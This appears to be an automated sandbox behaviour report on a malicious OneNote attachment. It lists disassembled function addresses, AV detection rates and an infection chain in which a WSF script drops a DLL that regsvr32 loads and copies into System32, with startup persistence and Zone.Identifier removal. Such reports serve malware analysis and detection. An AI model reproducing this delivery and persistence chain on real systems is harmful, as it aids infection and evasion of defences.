                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8B83C7_2_00C8B83C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C910307_2_00C91030
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9EC307_2_00C9EC30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C915C87_2_00C915C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9D5F07_2_00C9D5F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9BDA07_2_00C9BDA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C895BC7_2_00C895BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9610C7_2_00C9610C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA85007_2_00CA8500
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C975187_2_00C97518
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA99107_2_00CA9910
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9AD287_2_00C9AD28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C94D207_2_00C94D20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C919247_2_00C91924
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C861387_2_00C86138
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C875307_2_00C87530
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9B1307_2_00C9B130
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8D6CC7_2_00C8D6CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9EAC07_2_00C9EAC0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C996D47_2_00C996D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C892F07_2_00C892F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C88A8C7_2_00C88A8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA4E8C7_2_00CA4E8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8BE907_2_00C8BE90
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C94A907_2_00C94A90
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8AAB87_2_00C8AAB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C84EB87_2_00C84EB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C83ABC7_2_00C83ABC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9A6BC7_2_00C9A6BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9A2447_2_00C9A244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8B2587_2_00C8B258
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8F65C7_2_00C8F65C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8A6607_2_00C8A660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C90A707_2_00C90A70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C832747_2_00C83274
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C98E087_2_00C98E08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C83E0C7_2_00C83E0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9020C7_2_00C9020C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C95A007_2_00C95A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA8A007_2_00CA8A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8461C7_2_00C8461C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C842147_2_00C84214
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8BA2C7_2_00C8BA2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C98A2C7_2_00C98A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C90E2C7_2_00C90E2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9662C7_2_00C9662C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C997CC7_2_00C997CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C93FD07_2_00C93FD0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C82FD47_2_00C82FD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C833D47_2_00C833D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00CA27EC7_2_00CA27EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8A7F07_2_00C8A7F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C953847_2_00C95384
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C81B947_2_00C81B94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8DBA07_2_00C8DBA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8FFB87_2_00C8FFB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C98BB87_2_00C98BB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C88FB07_2_00C88FB0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C847587_2_00C84758
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8975C7_2_00C8975C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9E7507_2_00C9E750
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C883787_2_00C88378
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8F77C7_2_00C8F77C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9D7707_2_00C9D770
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9CF707_2_00C9CF70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C94F187_2_00C94F18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9E3107_2_00C9E310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8EF147_2_00C8EF14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C93B147_2_00C93B14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8D33C7_2_00C8D33C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_010F00008_2_010F0000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A706188_2_02A70618
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A56E428_2_02A56E42
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A773A48_2_02A773A4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A563F48_2_02A563F4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A58BC88_2_02A58BC8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A68FC88_2_02A68FC8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A63FD08_2_02A63FD0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A59B798_2_02A59B79
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A608CC8_2_02A608CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5640A8_2_02A5640A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5CC148_2_02A5CC14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A57D6C8_2_02A57D6C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A72AB08_2_02A72AB0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A67EBE8_2_02A67EBE
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A53ABC8_2_02A53ABC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6A6BC8_2_02A6A6BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5AAB88_2_02A5AAB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A54EB88_2_02A54EB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A72E848_2_02A72E84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A58A8C8_2_02A58A8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A74E8C8_2_02A74E8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5BE908_2_02A5BE90
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A64A908_2_02A64A90
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A592F08_2_02A592F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A736FC8_2_02A736FC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6EAC08_2_02A6EAC0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5D6CC8_2_02A5D6CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A696D48_2_02A696D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5BA2C8_2_02A5BA2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A68A2C8_2_02A68A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A60E2C8_2_02A60E2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6662C8_2_02A6662C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5263C8_2_02A5263C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A65A008_2_02A65A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A78A008_2_02A78A00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A53E0C8_2_02A53E0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6020C8_2_02A6020C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A68E088_2_02A68E08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A542148_2_02A54214
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5461C8_2_02A5461C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5A6608_2_02A5A660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A532748_2_02A53274
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A60A708_2_02A60A70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6A2448_2_02A6A244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A76E488_2_02A76E48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5F65C8_2_02A5F65C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5B2588_2_02A5B258
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5DBA08_2_02A5DBA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A747A88_2_02A747A8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A58FB08_2_02A58FB0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5FFB88_2_02A5FFB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A68BB88_2_02A68BB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A653848_2_02A65384
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A51B948_2_02A51B94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6779A8_2_02A6779A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A727EC8_2_02A727EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5A7F08_2_02A5A7F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6FFFC8_2_02A6FFFC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A697CC8_2_02A697CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A52FD48_2_02A52FD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A533D48_2_02A533D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5D33C8_2_02A5D33C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5EF148_2_02A5EF14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A63B148_2_02A63B14
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6E3108_2_02A6E310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A783108_2_02A78310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A75B1C8_2_02A75B1C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A64F188_2_02A64F18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A78B688_2_02A78B68
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6D7708_2_02A6D770
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6CF708_2_02A6CF70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5F77C8_2_02A5F77C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A583788_2_02A58378
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6E7508_2_02A6E750
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5975C8_2_02A5975C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A547588_2_02A54758
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A598AC8_2_02A598AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A744A88_2_02A744A8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6A8B08_2_02A6A8B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A794BC8_2_02A794BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5DCB88_2_02A5DCB8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A54C848_2_02A54C84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6CC848_2_02A6CC84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A658808_2_02A65880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A7488C8_2_02A7488C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5AC948_2_02A5AC94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A714948_2_02A71494
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6709C8_2_02A6709C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A620E08_2_02A620E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A53CF48_2_02A53CF4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A548FC8_2_02A548FC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A590F88_2_02A590F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5F8C48_2_02A5F8C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A65CC48_2_02A65CC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A580CC8_2_02A580CC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A514D48_2_02A514D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A63CD48_2_02A63CD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A71CD48_2_02A71CD4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A518DC8_2_02A518DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A610308_2_02A61030
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6EC308_2_02A6EC30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5B83C8_2_02A5B83C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A510008_2_02A51000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6A0008_2_02A6A000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A57C088_2_02A57C08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A594088_2_02A59408
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A574108_2_02A57410
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A7181C8_2_02A7181C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6B4608_2_02A6B460
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A758688_2_02A75868
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5D4748_2_02A5D474
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A66C708_2_02A66C70
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5B07C8_2_02A5B07C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A52C788_2_02A52C78
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A5C0788_2_02A5C078
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A578408_2_02A57840
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6C44C8_2_02A6C44C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A754508_2_02A75450
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6C0588_2_02A6C058
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6BDA08_2_02A6BDA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A595BC8_2_02A595BC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6D5F08_2_02A6D5F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A615C88_2_02A615C8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A619248_2_02A61924
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A64D208_2_02A64D20
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6AD288_2_02A6AD28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6B1308_2_02A6B130
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A561388_2_02A56138
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A785008_2_02A78500
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A721008_2_02A72100
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6610C8_2_02A6610C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A799108_2_02A79910
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A675188_2_02A67518
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A74D648_2_02A74D64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,7_2_0000000180010C10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,7_2_0000000180010AC0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,7_2_0000000180010DB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                        Source: Form - 16 Mar, 2023.oneReversingLabs: Detection: 38%
                        Source: Form - 16 Mar, 2023.oneVirustotal: Detection: 17%
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Form - 16 Mar, 2023.one
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll"
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DWxyui\KGQLMqgYfV.dll"
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll"Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DWxyui\KGQLMqgYfV.dll"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                        Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{A4CBEEA3-1FA3-4D28-9AC9-AD17C69AE228}Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{D6E66DB4-BAF8-49D5-97F2-F88802A632EE} - OProcSessId.datJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winONE@12/692@2/50
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C88BC8 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,7_2_00C88BC8
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180005C69 push rdi; ret 7_2_0000000180005C72
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800056DD push rdi; ret 7_2_00000001800056E4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C86CDE push esi; iretd 7_2_00C86CDF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C980D7 push ebp; retf 7_2_00C980D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8A0FC push ebp; iretd 7_2_00C8A0FD
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C86C9F pushad ; ret 7_2_00C86CAA
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8A1D2 push ebp; iretd 7_2_00C8A1D3
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C97987 push ebp; iretd 7_2_00C9798F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C97D4E push ebp; iretd 7_2_00C97D4F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C89D51 push ebp; retf 7_2_00C89D5A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C98157 push ebp; retf 7_2_00C98158
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C97D25 push 4D8BFFFFh; retf 7_2_00C97D2A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C97D3C push ebp; retf 7_2_00C97D3D
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C89E8B push eax; retf 7_2_00C89E8E
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C97EAF push 458BCC5Ah; retf 7_2_00C97EBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C8A26E push ebp; ret 7_2_00C8A26F
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00C9C731 push esi; iretd 7_2_00C9C732
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A67EAF push 458BCC5Ah; retf 8_2_02A67EBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A6C731 push esi; iretd 8_2_02A6C732
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A56C9F pushad ; ret 8_2_02A56CAA
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A56CDE push esi; iretd 8_2_02A56CDF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A67D25 push 4D8BFFFFh; retf 8_2_02A67D2A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A76D34 push edi; ret 8_2_02A76D36
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A67D3C push ebp; retf 8_2_02A67D3D
                        Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02A67D4E push ebp; iretd 8_2_02A67D4F
                        Source: radE00D6.tmp.dll.1.drStatic PE information: section name: _RDATA
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\DWxyui\KGQLMqgYfV.dll (copy)Jump to dropped file
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dllJump to dropped file
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\DWxyui\KGQLMqgYfV.dll (copy)Jump to dropped file
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\DWxyui\KGQLMqgYfV.dll:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
